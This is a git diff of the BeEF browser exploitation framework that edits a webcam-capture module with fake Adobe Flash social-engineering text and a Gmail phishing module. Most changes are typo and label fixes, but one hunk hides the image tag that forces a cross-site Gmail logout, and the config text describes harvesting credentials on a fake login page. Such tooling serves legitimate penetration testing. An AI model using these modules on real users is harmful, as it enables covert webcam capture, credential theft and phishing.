diff --git a/modules/browser/webcam/config.yaml b/modules/browser/webcam/config.yaml index 98cf7bba3..69f3eb5fb 100644 --- a/modules/browser/webcam/config.yaml +++ b/modules/browser/webcam/config.yaml @@ -19,7 +19,7 @@ beef: enable: true category: "Browser" name: "Webcam" - description: "This module will show the Adobe Flash allow webcam dialog to the user. The user has to click the allow button, otherwise this module will not return pictures. The title/text to convince the user can be customised. You can customise how many pictures you want to take and in which interval (default will take 20 pictures, 1 picture per second). The picture is sent as a base64 encoded JPG string." + description: "This module will show the Adobe Flash 'Allow Webcam' dialog to the user. The user has to click the allow button, otherwise this module will not return pictures.
The title/text to convince the user can be customised. You can customise how many pictures you want to take and in which interval (default will take 20 pictures, 1 picture per second). The picture is sent as a base64 encoded JPG string." authors: ["floyd @floyd_ch"] target: working: ["All"] diff --git a/modules/browser/webcam/module.rb b/modules/browser/webcam/module.rb index ad22db94c..de2df6639 100644 --- a/modules/browser/webcam/module.rb +++ b/modules/browser/webcam/module.rb @@ -21,7 +21,7 @@ class Webcam < BeEF::Core::Command end def self.options configuration = BeEF::Core::Configuration.instance - social_engineering_title = "This website is using Adobe Flashd" + social_engineering_title = "This website is using Adobe Flash" social_engineering_text = "In order to work with the programming framework this website is using, you need to allow the Adobe Flash Player Settings. If you use the new Ajax and HTML5 features in conjunction with Adobe Flash Player, it will increase your user experience." no_of_pictures = 20 interval = 1000 @@ -44,7 +44,7 @@ class Webcam < BeEF::Core::Command 'width' => '100px' }, { 'name' => 'interval', 'description' => 'The interval in which pictures are taken.', - 'ui_label' => 'Interval to take pictures in ms', + 'ui_label' => 'Interval to take pictures (ms)', 'value' => interval, 'width' => '100px' } ] diff --git a/modules/social_engineering/gmail_phishing/command.js b/modules/social_engineering/gmail_phishing/command.js index 0ab5166e8..0926bd59d 100644 --- a/modules/social_engineering/gmail_phishing/command.js +++ b/modules/social_engineering/gmail_phishing/command.js @@ -16,6 +16,9 @@ function logoutGoogle() { var img = document.createElement("IMG"); img.src = "https://mail.google.com/mail/?logout"; + img.height = "1px"; + img.width = "1px"; + img.style.visibility = "hidden"; document.body.appendChild(img); //set a new setTimeout to redo the logout setTimeout('logoutGoogle()', <%= @logout_gmail_interval %>); diff --git a/modules/social_engineering/gmail_phishing/config.yaml b/modules/social_engineering/gmail_phishing/config.yaml index 5b9d80039..2ec1d6c6e 100644 --- a/modules/social_engineering/gmail_phishing/config.yaml +++ b/modules/social_engineering/gmail_phishing/config.yaml @@ -19,7 +19,7 @@ beef: enable: true category: ["Social Engineering"] name: "Google Phishing" - description: "This plugin uses an image tag to XSRF the logout button of Gmail. continuously the user is logged out of Gmail (eg. if he is logged in in another tab). Additionally it will show the Google favicon and a Gmail phishing page (altough the URL is NOT the Gmail URL)." + description: "This plugin uses an image tag to XSRF the logout button of Gmail. Continuously the user is logged out of Gmail (eg. if he is logged in in another tab). Additionally it will show the Google favicon and a Gmail phishing page (although the URL is NOT the Gmail URL)." authors: ["floyd @floyd_ch floyd.ch"] target: user_notify: ['ALL'] diff --git a/modules/social_engineering/gmail_phishing/module.rb b/modules/social_engineering/gmail_phishing/module.rb index 80f419ceb..dc12c3a33 100644 --- a/modules/social_engineering/gmail_phishing/module.rb +++ b/modules/social_engineering/gmail_phishing/module.rb @@ -29,12 +29,12 @@ class Gmail_phishing < BeEF::Core::Command 'width' => '300px' }, { 'name' => 'logout_gmail_interval', 'description' => 'The victim is continuously loged out of Gmail. This is the interval in ms.', - 'ui_label' => 'Ms Gmail logout interval', + 'ui_label' => 'Gmail logout interval (ms)', 'value' => logout_gmail_interval, 'width' => '100px' }, { 'name' => 'wait_seconds_before_redirect', - 'description' => 'When the user submits his credentials on the phishing page, we have to wait (in ms) before we redirect to the real Gmail page, so that BeeF gets the credentials in time.', - 'ui_label' => 'Ms before redirecting', + 'description' => 'When the user submits his credentials on the phishing page, we have to wait (in ms) before we redirect to the real Gmail page, so that BeEF gets the credentials in time.', + 'ui_label' => 'Redirect delay (ms)', 'value' => wait_seconds_before_redirect, 'width' => '100px' } ]